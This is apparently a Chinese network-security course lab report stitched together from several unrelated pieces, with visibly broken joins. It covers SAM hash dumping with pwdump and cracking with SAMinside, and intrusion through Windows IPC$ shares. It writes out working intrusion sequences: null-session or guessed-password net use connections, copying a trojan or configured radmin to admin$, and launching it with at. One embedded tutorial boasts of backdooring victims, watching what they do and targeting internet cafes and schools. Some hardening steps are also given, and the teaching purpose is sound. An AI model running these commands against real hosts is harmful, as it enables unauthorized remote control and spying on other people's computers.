实训1-3：利用IPC漏洞进行远程攻击

《网络安全与管理》实训报告指导老师：班级：学号：姓名：实训一、Windows口令安全与破译Pwdump导出本地sam散列实验目的1.理解saminside破解本地sam散列的原理。

2.学习psaminside破解本地sam散列的过程。

实验原理1.Windows hash由LM HASH&NT HASH组成。

2.LM HASH生成规则系统中用户密码编码使用了OEM内码页，用户密码被限制为最多14个字符，不足14字节用0补全，并转换为大写。

固定长度的密码分成两个7 byte部分，每部分在末尾加0，组成新的编码。

以上步骤得到的两部分8byte组，分别作为DES key 进行加密。

将加密后的两组进行拼接，就成了LM HASH值。

3.NT HASH生成规则把明文口令从ASCII使用little-endian序转换成Unicode字符，对所获取的Unicode串进行标准MD4单向哈希，无论数据源长度多少字节，MD4固定产生128-bit的哈希值，就得到了NT HASH值。

实验步骤1.打开开始菜单，找到运行输入“cmd”，找到pwdump工具，在cmd中输入pwddump 工具路径。

如下图2.继续在cmd中输入pwdump.exe ，如图进入pwdump界面。

3.然后再输入pwdump.exe --dump-hash-local，获得当前用户的SAM值。

4.右键标记，复制到文本中，保存到桌面上。

5.打开文件夹C：\实验工具集\02主机安全\02_windows口令安全与破解\第三节 saminside破解本地sam散列，打开SAMinside.exe6.导入HASH值文档。

7.选择要破解的账户，点击Audit,选择NT HASH Attack和Dictionary Attack。

8.选择工具下的Opentions。

9.选择Dictionary选项，右边选择Add，添加打开文件夹C：\实验工具集\02主机安全\02_windows口令安全与破解\第三节 saminside破解本地sam散列文件下，Other文件夹下的InsidePro(Mini).dic密码字典。

网络安全实验：系统入侵基本操作-------IPC$漏洞及远程控制实验名称：系统入侵基本操作-------IPC$漏洞及远程控制实验目的：了解一般性系统入侵的基本步骤，理解IPC$漏洞原理，掌握常见扫描工具使用，掌握net命令使用，掌握一般系统防范基本方法。

技术原理：一般入侵步骤：主机扫描----漏洞扫描-----利用漏洞入侵-----操作----留后门----痕迹清除IPC$(Internet Process Connection) 是共享“命名管道”的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。

NT/2000在提供了ipc$功能的同时，在初次安装系统时还打开了默认共享，即所有的逻辑共享(c$,d$,e$……)和系统目录winnt或windows (admin$)共享。

空会话是在没有信任的情况下与服务器建立的会话（即未提供用户名与密码），但根据WIN2000的访问控制模型，空会话的建立同样需要提供一个令牌，可是空会话在建立过程中并没有经过用户信息的认证，所以这个令牌中不包含用户信息对于NT，在默认设置下，借助空连接可以列举目标主机上的用户和共享，访问everyone权限的共享网络命令：参见幻灯片网络命令.ppt远程控制软件：木马属于远程控制软件，被控制端安装服务端程序，控制端安装客户端程序。

常见木马有BO2000，冰河，广外女生，灰鸽子等等。

扫描软件：分为主机扫描，服务扫描，漏洞扫描等。

常用扫描软件：x-scan,supper scan,流光等。

实验环境：网络机房，基本win2000环境，木马软件，扫描软件。

实验步骤：1.安装流光，准备木马（有些木马工具需要生成服务端，但是注意不要执行服务端，否则就安装到自己的机器上了）。

2.对选定网段进行扫描。

确定主机。

（选定网段范围不要过大）3.对存在IPC$漏洞的主机进行连接。

ipc$共享入侵详细教程ipc$共享入侵微软在win2000，xp中设置的这个功能对个人用户来说几乎毫无用处。

反而成了黑客入侵nt架构操作系统的一条便利通道。

如果你的操作系统存在不安全的口令，那就更可怕了。

一条典型的入侵流程如下：（1）用任何办法得到一个帐户与口令（猜测，破解），网上流传有一个叫做smbcrack的软件就是利用ipc$来破解帐户口令的。

如果你的密码位数不高，又很简单，是很容易被破解的。

根据我的个人经验，相当多的人都将administrator的口令设为123，2003，或者干脆不设密码。

（2）使用命令net use \\123.1.1.1\ipc$“密码”/user:“用户名”建立一个有一定权限的ipc$连接。

用copy trojan.exe \\xxx.xxx.xxx.xxx\admin$ 将木马程序的服务器端复制到系统目录下。

（3）用net time \\xxx.xxx.xxx.xxx 命令查看对方操作系统的时间，然后用at \\202.xxx.xxx.xxx 12：00 trojan.exe 让trojan.exe在指定时间运行。

这样一来，你的电脑就完全被黑客控制了。

应对措施：禁用server服务, Task Scheduler服务，去掉网络文件和打印机共享前的对勾(插入图1)，当然，给自己的帐户加上强壮的口令才是最关键的。

而且在一般情况下，一些功能对管理员来说也是没有必要的。

如果你不需要MS SQL Server 的xp_cmdshell(use sp_dropextendedproc "xp_cmdshell"这项功能就不要把xp_cmdshell extended stored proc(扩展存储过程)命令功能留着。

我们只需要在isql窗口中输入：use mastersp_dropextendedproc 'xp_cmdshell'net use 映射盘符: \\肉鸡IP\肉鸡盘符譬如：net use z: \\1.1.1.1\c (把对方的c盘映射成你的z盘)，察看一下开了哪些端口,有445哦,(主要是针对2000系统的)netstat -an命令:net view(有的机器用的是win98的系统查不出的)看一下自己的IP再看看用户:于是可以进行IPC$连接了(关于IPC$空连接的资料你可以上网搜索一下)命令:net use \\220.160.199.38\ipc$ "" /user:Administrator命令:net use \\ip\ipc$ 密码/user:用户net use \\220.160.199.38\ipc$ "" /user:"zyz"显示命令成功可以用这个命令看下是否成功:net use好了,现在我们给他传个咚咚--我配置好的radmin命令:copy 本地文件远程目录如:copy c:\4899.exe \\192.168.0.200\admin$(这里的$是指admin用户的c:\winnt\system32\)传过去了,我们当然要运行它啊,怎么运行呢?接着看现在我们来看看他机器的时间命令:net time \\192.168.0.200然后用这个命令启动at \\192.168.0.200 时间要运行的文件at \\IP 时间要运行的文件(这个是计划任务里边的一个命令)好了,然后呢,嘿嘿----等!看下我们的后门运行了没有?呵呵,上线了我回头看看是哪个MM or GG?我们看看她在干什么?嘿嘿~OK了吧!至于以后你要做什么,就看你了这个方法还可以入侵网吧的主机,其实内网一般都有这个漏洞特别象学校或网吧等地方我试过了,不过,现在偶不搞他好了,到这里了,防范方法在下边,88!防范ipc$入侵:1.禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》) 首先运行regedit，找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LS A]把RestrictAnonymous = DWORD的键值改为：00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)2.禁止默认共享1）察看本地共享资源运行-cmd-输入net share2）删除共享(每次输入一个）net share ipc$ /deletenet share admin$ /deletenet share c$ /deletenet share d$ /delete（如果有e,f,……可以继续删除）3）停止server服务net stop server /y （重新启动后server服务会重新开启）4）修改注册表运行-regeditserver版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\L anmanServer\Parameters]把AutoShareServer（DWORD）的键值改为:00000000。

方法一、使用空密码连线现在假设目标电脑的IP地址是202.64.161.X （X为任选数字）, 先使用nbtstat 指令查看对方NT的网络数据:nbtstat -A 202.64.161.X如果看到<20 的字样, 那么此NT系统可能将自己电脑数据共享出来。

其实在NT安装后, 会将电脑上的驱动器都共享出来, 没错, 是自动共享出来的! 不过只是隐藏了, 所以你未必会看得见。

而很多人在安装好NT后未做任何设置便即使用, 这正好给黑客一个入侵的大好机会。

随后黑客就会使用Net View 指令看看这个IP 地址:net view \\202.64.161.X正常来说会出现系统发生 System error 5 has occurred 的字样。

这就是NT比Win95/98 安全的地方! 如果是Win95/98 , 只要使用net view 指令就可以看到对方电脑所有共享出来的资源, 如果是NT就一定要登录进入NT服务器才可以用net view 指令。

但黑客并没有对NT服务器的帐户, 又怎样登录呢? 其实NT有一个很大的漏洞, 它有一个ipc$( Inter-Process Communication：进程间通讯 ) , 其同样是隐藏共享, 作为服务器与服务器间的沟通, 只要连接到对方的IPC, 便有机会入侵了。

他会先用null password ( 空密码, 即是没有密码! ) 来试试, 手法如下:net use \\202.64.161.X\ipc$ “ ” /use:“ ”以上的“ ” 是空密码的意思, 如果连接上会看见“指令执行成功”的字样。

接着便再用net view \\202.64.161.X然后便可以看到对方所有共享出来的资源了。

接着黑客会用net use 指令, 把对方共享出来的资源映射成自己的网络驱动器, 之后想怎样用就随心所欲了。

如果对方没有把隐藏共享取消, 黑客可以用以下指令:net use X: \\ip地址\c$那对方的C 盘便会变成自己的X 盘了, 不过这方法未必一定可行, 因为NT服务器安装了Services Pack 3 或以上版本, 用空密码连接IPC$ 的权限被限制, 不能够映射NT上的驱动器 , 这时便要使用下一个方法。

实验五网络入侵实验（一）实验目的学会网络入侵的基本步骤和方法，掌握ipc入侵的原理和防御之策。

（二）实验内容1．利用Xscan软件扫描系统漏洞2．利用ipc$漏洞入侵系统3．对系统实行基本的安全防范（三）实验环境配置在局域网中利用主机1入侵主机4主机4 IP：192.168.1.104，子网掩码：255.225.255.0，操作系统:Windows 2000；主机1 IP：192.168.1.101，子网掩码：255.225.255.0，操作系统:Windows 2000，扫描软件：Xscan；两主机用交换机连接，用ping命令测试两主机的连通性，不通要重接；（四）名词解释及常用命令简介1．ipc$IPC$(Internet Process Connection)是共享“管道”资源，它是为管理员远程管理计算机共享资源时使用，当验证合法用户名和密码时，远程用户可获得相应的资源共享访问限权。

$表示共享。

IPC$的漏洞在于：在获得合法管理员帐号和密码时，系统默认共享主机所有资源，方便管理员的远程管理。

2．Xscan3.3 扫描工具简介Xscan是一款黑客常用到的扫描工具，采用多线程对指定IP地址段进行安全漏洞检测，扫描内容包括：远程操作系统类型及版本，标准端口状态，漏洞，SQL-SERVER、FTP-SERVER、SMTP-SERVER、NT-SERVER 等弱口令用户，并对于一些已知漏洞给出相应的漏洞描述、入侵步骤及安全解决方案。

3．入侵命令① net use建立ipc共享空链接格式：net use \\对方IP\ipc$ "" /user:""用途：建立IPC空链接，用于测试对方主机是否存在共享漏洞。

效果：若提示“命令成功”，表示对方主机存在漏洞，若提示“找不到网径”表示不存在系统漏洞；举例：net use \\192.168.1.11\ipc$ "" /user:""解释：查看192.168.1.11主机是否存在共享漏洞② net use建立ipc共享链接格式：net use \\对方IP\ipc$ "密码" /user:"用户名"用途：用扫描软件破解出对方用户名及密码后进行入侵；举例：net use \\192.168.1.11\ipc$ "123" /user:"Administrator"解释: 以用户名为Administrator，密码为123建立与192.168.1.11的共享连接；③ net use 映射对方磁盘格式：net use x: \\对方IP\c$用途：映射对方IP的c盘到到本地x盘，即可在本机看到对方c盘的全部内容。

网络安全管理课程设计学院：计算机科学与技术学院专业：计算机网络技术姓名： LIU学号：33班级：B1452指导教师：目录一、本地系统密码破解 (1)实验原理： (1)实验步骤： (1)实验小结： (4)二、IPC$管道的利用与远程控制 (4)实验原理及相关知识： (4)实验步骤： (4)实验小结： (7)三、网络信息收集 (7)实验目的和备用知识 (7)Fluxay密码扫描 (8)实验原理： (8)实验步骤： (8)Nmap端口扫描 (10)实验原理： (10)实验步骤： (11)实验小结 (12)四、Windows 口令安全与破解 (13)pwdump导出本地SAM散列 (12)实验原理： (12)实验步骤： (13)LC5破解本地SAM散列 (14)实验原理： (14)实验步骤： (14)saminside破解本地sam散列 (16)实验步骤： (16)实验小结 (17)五、Ipsec VPN (17)实验原理： (17)实验步骤： (19)实验小结： (24)六、SQL注入技术 (25)SQL注入原理-手工注入access数据库 (25)实验原理： (25)实验步骤： (25)SQL注入原理-手工联合查询注入 (28)实验原理： (28)实验步骤： (28)SQL注入原理-数字型注入 (30)实验原理： (30)实验步骤： (30)实验小结： (34)七、实训总结 (35)一本地系统密码破解【实验原理】暴力破解，有时也称为穷举法，是一种针对于密码的破译方法。

这种方法很像数学上的“完全归纳法”并在密码破译方面得到了广泛的应用。

简单来说就是将密码进行逐个推算直到找出真正的密码为止。

比如一个四位并且全部由数字组成其密码共有10000种组合，也就是说最多我们会尝试10000次才能找到真正的密码。

利用这种方法我们可以运用计算机来进行逐个推算，可见破解任何一个密码只是时间问题。

Saminside即通过读取本地帐户的lmhash值，对hash值进行暴力破解的工具。

IPC$入侵：远程磁盘映射IPC$介绍：IPC$是Windows系统特有的一项管理功能，是微软公司为了方便用户使用计算机而设计的，主要用来远程管理计算机的。

但事实上使用这个功能的黑客可以通过建立IPC$连接与远程主机实现通信和控制。

通过IPC$连接的建立，黑客能够做到：1 建立、拷贝、删除远程计算机文件；2 在远程计算机上执行命令。

的缩写，可以理解为“命名管道”资源，它是Windows操作系统提供的一个通信基础，用来在两台计算机进程之间建立通信连接。

而IPC后面的“$”是Windows系统所使用的隐藏符号，因此“IPC$”表示IPC共享，但是是隐藏的共享。

IPC$是Windows NT及Windows 2000/XP/2003特有的一项功能，通过这项功能，一些网络程序的数据交换可以建立在IPC上面，实现远程访问和管理计算机。

打个比方，IPC连接就像是挖好的地道，通信程序就通过这个IPC地道访问目标主机。

默认情况下IPC是共享的，除非手动删除IPC$。

通过IPC$连接，入侵者就能够实现远程控制目标主机。

因此，这种基于IPC的入侵也常常被简称为IPC入侵。

操作系统（不包括Windows 98系列）在安装完成后，自动设置共享的目录为：C盘、D盘、E盘、ADMIN目录（C:\WINNT\）等，即为ADMIN$、C$、D$、E$等等，但要注意，这些共享是隐藏的，只有管理员能够对他们进行远程操作。

演示：在MS-DOS中键入“net share”命令来查看本机共享资源。

如何消除默认共享？DOS命令，这些都是DOS中经常使用的命令。

DIR命令：列出当前路径下的文件，常常用来查看想要找的文件是否在该路径下。

CD命令：进入指定的目录。

比如，想进入E盘中的CODE文件夹，则在E:\>下键入“CD CODE”命令。

：系统账号类操作；net localgroup：系统组操作net use：远程连接、映射操作net send：信使命令net time：查看远程主机系统时间cls命令：清屏命令。